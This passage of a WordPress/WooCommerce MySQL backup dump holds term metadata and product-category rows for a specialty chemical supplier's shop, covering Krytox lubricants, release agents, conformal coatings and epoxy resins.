INSERT INTO `wp_termmeta` VALUES (746, 335, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (747, 336, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (748, 337, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (749, 338, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (750, 339, 'order', '80'); 
INSERT INTO `wp_termmeta` VALUES (751, 339, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (752, 339, 'thumbnail_id', '1714'); 
INSERT INTO `wp_termmeta` VALUES (753, 339, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (754, 339, 'product_count_product_cat', '20'); 
INSERT INTO `wp_termmeta` VALUES (755, 340, 'order', '81'); 
INSERT INTO `wp_termmeta` VALUES (756, 340, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (757, 340, 'thumbnail_id', '1703'); 
INSERT INTO `wp_termmeta` VALUES (758, 341, 'order', '82'); 
INSERT INTO `wp_termmeta` VALUES (759, 341, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (760, 341, 'thumbnail_id', '1700'); 
INSERT INTO `wp_termmeta` VALUES (764, 343, 'order', '83'); 
INSERT INTO `wp_termmeta` VALUES (765, 343, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (766, 343, 'thumbnail_id', '1125'); 
INSERT INTO `wp_termmeta` VALUES (767, 340, 'product_count_product_cat', '5'); 
INSERT INTO `wp_termmeta` VALUES (768, 341, 'product_count_product_cat', '5'); 
INSERT INTO `wp_termmeta` VALUES (769, 344, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (770, 345, 'product_count_product_tag', '3'); 
INSERT INTO `wp_termmeta` VALUES (771, 346, 'product_count_product_tag', '3'); 
INSERT INTO `wp_termmeta` VALUES (772, 347, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (773, 348, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (774, 349, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (775, 350, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (776, 351, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (777, 352, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (778, 341, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (779, 340, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (780, 343, 'product_count_product_cat', '10'); 
INSERT INTO `wp_termmeta` VALUES (781, 353, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (782, 354, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (783, 355, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (784, 356, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (785, 357, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (786, 358, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (787, 359, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (788, 360, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (789, 361, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (790, 362, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (791, 363, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (792, 364, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (793, 365, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (794, 366, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (795, 367, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (796, 368, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (797, 369, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (798, 343, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (799, 370, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (800, 371, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (801, 372, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (802, 373, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (803, 374, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (804, 375, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (805, 376, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (806, 377, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (807, 378, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (808, 379, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (809, 380, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (810, 381, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (811, 382, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (812, 383, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (813, 384, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (814, 385, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (815, 386, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (816, 387, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (817, 388, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (818, 389, 'product_count_product_tag', '8'); 
INSERT INTO `wp_termmeta` VALUES (819, 390, 'product_count_product_tag', '5'); 
INSERT INTO `wp_termmeta` VALUES (820, 391, 'product_count_product_tag', '3'); 
INSERT INTO `wp_termmeta` VALUES (821, 392, 'product_count_product_tag', '9'); 
INSERT INTO `wp_termmeta` VALUES (822, 393, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (823, 394, 'product_count_product_tag', '6'); 
INSERT INTO `wp_termmeta` VALUES (824, 395, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (825, 396, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (826, 397, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (827, 398, 'product_count_product_tag', '12'); 
INSERT INTO `wp_termmeta` VALUES (828, 399, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (829, 400, 'product_count_product_tag', '10'); 
INSERT INTO `wp_termmeta` VALUES (830, 401, 'product_count_product_tag', '10'); 
INSERT INTO `wp_termmeta` VALUES (831, 402, 'product_count_product_tag', '10'); 
INSERT INTO `wp_termmeta` VALUES (832, 403, 'product_count_product_tag', '10'); 
INSERT INTO `wp_termmeta` VALUES (833, 404, 'product_count_product_tag', '10'); 
INSERT INTO `wp_termmeta` VALUES (834, 405, 'product_count_product_tag', '10'); 
INSERT INTO `wp_termmeta` VALUES (835, 406, 'product_count_product_tag', '4'); 
INSERT INTO `wp_termmeta` VALUES (836, 407, 'product_count_product_tag', '4'); 
INSERT INTO `wp_termmeta` VALUES (837, 408, 'product_count_product_tag', '4'); 
INSERT INTO `wp_termmeta` VALUES (838, 409, 'product_count_product_tag', '4'); 
INSERT INTO `wp_termmeta` VALUES (839, 410, 'product_count_product_tag', '4'); 
INSERT INTO `wp_termmeta` VALUES (840, 411, 'product_count_product_tag', '9'); 
INSERT INTO `wp_termmeta` VALUES (841, 412, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (842, 413, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (843, 414, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (844, 415, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (845, 416, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (846, 417, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (847, 418, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (848, 419, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (849, 420, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (850, 421, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (851, 422, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (852, 423, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (853, 424, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (854, 425, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (855, 426, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (856, 427, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (857, 428, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (858, 175, 'cat_meta', ''); 
INSERT INTO `wp_termmeta` VALUES (859, 429, 'product_count_product_tag', '20'); 
INSERT INTO `wp_termmeta` VALUES (860, 430, 'product_count_product_tag', '20'); 
INSERT INTO `wp_termmeta` VALUES (861, 431, 'product_count_product_tag', '5'); 
INSERT INTO `wp_termmeta` VALUES (862, 432, 'product_count_product_tag', '20'); 
INSERT INTO `wp_termmeta` VALUES (863, 433, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (864, 94, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (865, 434, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (866, 435, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (867, 436, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (868, 127, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (869, 161, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (870, 152, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (871, 138, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (872, 137, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (873, 142, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (874, 177, 'cat_meta', ''); 
INSERT INTO `wp_termmeta` VALUES (875, 437, 'product_count_product_tag', '10'); 
INSERT INTO `wp_termmeta` VALUES (876, 438, 'product_count_product_tag', '10'); 
INSERT INTO `wp_termmeta` VALUES (877, 439, 'product_count_product_tag', '4'); 
INSERT INTO `wp_termmeta` VALUES (878, 440, 'product_count_product_tag', '4'); 
INSERT INTO `wp_termmeta` VALUES (879, 441, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (880, 442, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (881, 443, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (882, 444, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (883, 445, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (884, 446, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (885, 447, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (886, 448, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (887, 449, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (888, 450, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (889, 451, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (890, 452, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (891, 453, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (892, 454, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (893, 455, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (894, 462, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (895, 463, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (896, 482, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (897, 483, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (898, 484, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (899, 489, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (900, 492, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (901, 325, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (902, 502, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (903, 503, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (904, 504, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (905, 510, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (906, 511, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (907, 511, 'display_type', ''); 
INSERT INTO `wp_termmeta` VALUES (908, 511, 'thumbnail_id', '2570'); 
INSERT INTO `wp_termmeta` VALUES (909, 511, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (912, 514, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (914, 515, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (915, 515, 'product_count_product_cat', '4'); 
INSERT INTO `wp_termmeta` VALUES (916, 515, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (917, 515, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (918, 515, 'thumbnail_id', '3712'); 
INSERT INTO `wp_termmeta` VALUES (920, 516, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (921, 516, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (922, 516, 'thumbnail_id', '3714'); 
INSERT INTO `wp_termmeta` VALUES (923, 516, 'product_count_product_cat', '3'); 
INSERT INTO `wp_termmeta` VALUES (924, 517, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (925, 517, 'display_type', ''); 
INSERT INTO `wp_termmeta` VALUES (926, 517, 'thumbnail_id', '3715'); 
INSERT INTO `wp_termmeta` VALUES (927, 517, 'product_count_product_cat', '2'); 
INSERT INTO `wp_termmeta` VALUES (928, 517, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (929, 518, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (930, 518, 'display_type', ''); 
INSERT INTO `wp_termmeta` VALUES (931, 518, 'thumbnail_id', '3716'); 
INSERT INTO `wp_termmeta` VALUES (932, 519, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (933, 519, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (934, 519, 'thumbnail_id', '3717'); 
INSERT INTO `wp_termmeta` VALUES (935, 520, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (936, 520, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (937, 520, 'thumbnail_id', '3718'); 
INSERT INTO `wp_termmeta` VALUES (938, 520, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (939, 518, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (940, 519, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (941, 521, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (943, 521, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (944, 521, 'thumbnail_id', '4102'); 
INSERT INTO `wp_termmeta` VALUES (945, 522, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (946, 522, 'image', '4103'); 
INSERT INTO `wp_termmeta` VALUES (947, 522, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (948, 522, 'thumbnail_id', '4103'); 
INSERT INTO `wp_termmeta` VALUES (949, 523, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (951, 523, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (952, 523, 'thumbnail_id', '4104'); 
INSERT INTO `wp_termmeta` VALUES (953, 524, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (955, 524, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (956, 524, 'thumbnail_id', '4105'); 
INSERT INTO `wp_termmeta` VALUES (957, 524, 'product_count_product_cat', '3'); 
INSERT INTO `wp_termmeta` VALUES (958, 521, 'product_count_product_cat', '6'); 
INSERT INTO `wp_termmeta` VALUES (959, 522, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (960, 523, 'product_count_product_cat', '3'); 
INSERT INTO `wp_termmeta` VALUES (961, 524, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (962, 522, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (963, 523, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (964, 521, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (965, 525, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (966, 525, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (967, 525, 'thumbnail_id', '4176'); 
INSERT INTO `wp_termmeta` VALUES (968, 526, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (969, 526, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (970, 526, 'thumbnail_id', '4177'); 
INSERT INTO `wp_termmeta` VALUES (971, 525, 'product_count_product_cat', '4'); 
INSERT INTO `wp_termmeta` VALUES (972, 526, 'product_count_product_cat', '7'); 
INSERT INTO `wp_termmeta` VALUES (973, 526, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (974, 525, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (975, 527, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (976, 527, 'display_type', ''); 
INSERT INTO `wp_termmeta` VALUES (977, 527, 'thumbnail_id', '4281'); 
INSERT INTO `wp_termmeta` VALUES (978, 527, 'product_count_product_cat', '6'); 
INSERT INTO `wp_termmeta` VALUES (979, 527, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (980, 528, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (981, 528, 'display_type', ''); 
INSERT INTO `wp_termmeta` VALUES (982, 528, 'thumbnail_id', '4282'); 
INSERT INTO `wp_termmeta` VALUES (983, 528, 'product_count_product_cat', '4'); 
INSERT INTO `wp_termmeta` VALUES (984, 528, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (985, 529, 'order', '0'); 
INSERT INTO `wp_termmeta` VALUES (986, 529, 'display_type', 'both'); 
INSERT INTO `wp_termmeta` VALUES (987, 529, 'thumbnail_id', '4287'); 
INSERT INTO `wp_termmeta` VALUES (988, 529, 'product_count_product_cat', '2'); 
INSERT INTO `wp_termmeta` VALUES (989, 529, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (990, 530, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (991, 531, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (992, 228, 'cat_meta', '');
#
# End of data contents of table `wp_termmeta`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_terms`


#
# Delete any existing table `wp_terms`
#

DROP TABLE IF EXISTS `wp_terms`;


#
# Table structure of table `wp_terms`
#

CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=532 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_terms`
#
 
INSERT INTO `wp_terms` VALUES (1, 'Press Release', 'press-release', 0); 
INSERT INTO `wp_terms` VALUES (2, 'simple', 'simple', 0); 
INSERT INTO `wp_terms` VALUES (3, 'grouped', 'grouped', 0); 
INSERT INTO `wp_terms` VALUES (4, 'variable', 'variable', 0); 
INSERT INTO `wp_terms` VALUES (5, 'external', 'external', 0); 
INSERT INTO `wp_terms` VALUES (6, 'Main Menu', 'main-menu', 0); 
INSERT INTO `wp_terms` VALUES (7, 'Top Bar Menu', 'top-bar-menu', 0); 
INSERT INTO `wp_terms` VALUES (8, 'Mold Release Agents', 'mold-release-agents', 0); 
INSERT INTO `wp_terms` VALUES (9, 'Krytox Lubricants', 'krytox-lubricants', 0); 
INSERT INTO `wp_terms` VALUES (10, 'Specialty Solvents', 'solvents', 0); 
INSERT INTO `wp_terms` VALUES (11, 'Conformal Coatings', 'conformal-coating', 0); 
INSERT INTO `wp_terms` VALUES (12, 'MS Medical', 'medical-chemicals', 0); 
INSERT INTO `wp_terms` VALUES (13, 'VAZO Radical Initiator', 'vazo-radical-initiators', 0); 
INSERT INTO `wp_terms` VALUES (14, 'Products', 'products', 0); 
INSERT INTO `wp_terms` VALUES (16, 'PTFE Release Agents', 'ptfe-release-agents', 0); 
INSERT INTO `wp_terms` VALUES (17, 'ptfe', 'ptfe', 0); 
INSERT INTO `wp_terms` VALUES (18, 'release', 'release', 0); 
INSERT INTO `wp_terms` VALUES (19, 'agent', 'agent', 0); 
INSERT INTO `wp_terms` VALUES (20, 'High-Temp Release Agents', 'high-temp-release-agents', 0); 
INSERT INTO `wp_terms` VALUES (21, 'Semi-Permanent Release Agents', 'semi-permanent-release-agents', 0); 
INSERT INTO `wp_terms` VALUES (27, 'Urethane Conformal Coating', 'urethane-conformal-coating', 0); 
INSERT INTO `wp_terms` VALUES (28, 'Silicone Conformal Coating', 'silicone-conformal-coating', 0); 
INSERT INTO `wp_terms` VALUES (29, 'Acrylic Conformal Coating', 'acrylic-conformal-coating', 0); 
INSERT INTO `wp_terms` VALUES (30, 'Protective Varnish', 'protective-varnish', 0); 
INSERT INTO `wp_terms` VALUES (31, 'Conformal Coating Stripping Agent', 'conformal-coating-stripping-agent', 0); 
INSERT INTO `wp_terms` VALUES (34, 'GPL Series', 'krytox-gpl-series', 0); 
INSERT INTO `wp_terms` VALUES (35, 'Aerospace Series', 'krytox-aerospace', 0); 
INSERT INTO `wp_terms` VALUES (36, 'NRT Series', 'krytox-nrt', 0); 
INSERT INTO `wp_terms` VALUES (37, 'AUT Series', 'krytox-aut-series', 0); 
INSERT INTO `wp_terms` VALUES (38, 'LVP/ VPF Series', 'krytox-lvp-vpf', 0); 
INSERT INTO `wp_terms` VALUES (39, '157 FS Series', 'fsh-series', 0); 
INSERT INTO `wp_terms` VALUES (40, 'XHT Series', 'krytox-xht', 0); 
INSERT INTO `wp_terms` VALUES (41, 'SIZES AVAILABLE', 'sizes-available', 0); 
INSERT INTO `wp_terms` VALUES (42, 'TDS', 'tds', 0); 
INSERT INTO `wp_terms` VALUES (43, '2 oz', '2-oz', 0); 
INSERT INTO `wp_terms` VALUES (44, '5 oz', '5-oz', 0); 
INSERT INTO `wp_terms` VALUES (45, 'GPL Oils', 'krytox-gpl-oils', 0); 
INSERT INTO `wp_terms` VALUES (46, 'GPL Greases', 'krytox-gpl-greases', 0); 
INSERT INTO `wp_terms` VALUES (79, 'Aerospace &amp; Aviation Oils', 'aerospace-aviation-oils', 0); 
INSERT INTO `wp_terms` VALUES (86, 'Aerospace &amp; Aviation Greases', 'krytox-aerospace-aviation-greases', 0); 
INSERT INTO `wp_terms` VALUES (93, 'Epoxy Resin Systems', 'epoxy-resins', 0); 
INSERT INTO `wp_terms` VALUES (94, 'Specialty Products', 'specialty-products', 0); 
INSERT INTO `wp_terms` VALUES (95, 'EPON™ Epoxy Resin', 'epon-epoxy-resin', 0); 
INSERT INTO `wp_terms` VALUES (96, 'GPL 200-207', 'krytox-gpl-200-207', 0); 
INSERT INTO `wp_terms` VALUES (97, 'GPL 210-217', 'krytox-gpl-extreme-pressure', 0); 
INSERT INTO `wp_terms` VALUES (98, 'GPL 220-227', 'krytox-anticorrosion', 0); 
INSERT INTO `wp_terms` VALUES (99, '240 Series', 'krytox-240', 0); 
INSERT INTO `wp_terms` VALUES (100, '250 Series', 'krytox-250-series', 0); 
INSERT INTO `wp_terms` VALUES (101, '283 Series', 'krytox-283-series', 0); 
INSERT INTO `wp_terms` VALUES (102, 'Krytox', 'krytox', 0); 
INSERT INTO `wp_terms` VALUES (103, 'Aerospace', 'aerospace', 0); 
INSERT INTO `wp_terms` VALUES (104, 'Aviation', 'aviation', 0); 
INSERT INTO `wp_terms` VALUES (105, 'Grease', 'grease', 0); 
INSERT INTO `wp_terms` VALUES (106, 'Lubricant', 'lubricant', 0); 
INSERT INTO `wp_terms` VALUES (107, 'Krytox Aerospace Aviation Grease Lubricant', 'krytox-aerospace-aviation-grease-lubricant', 0); 
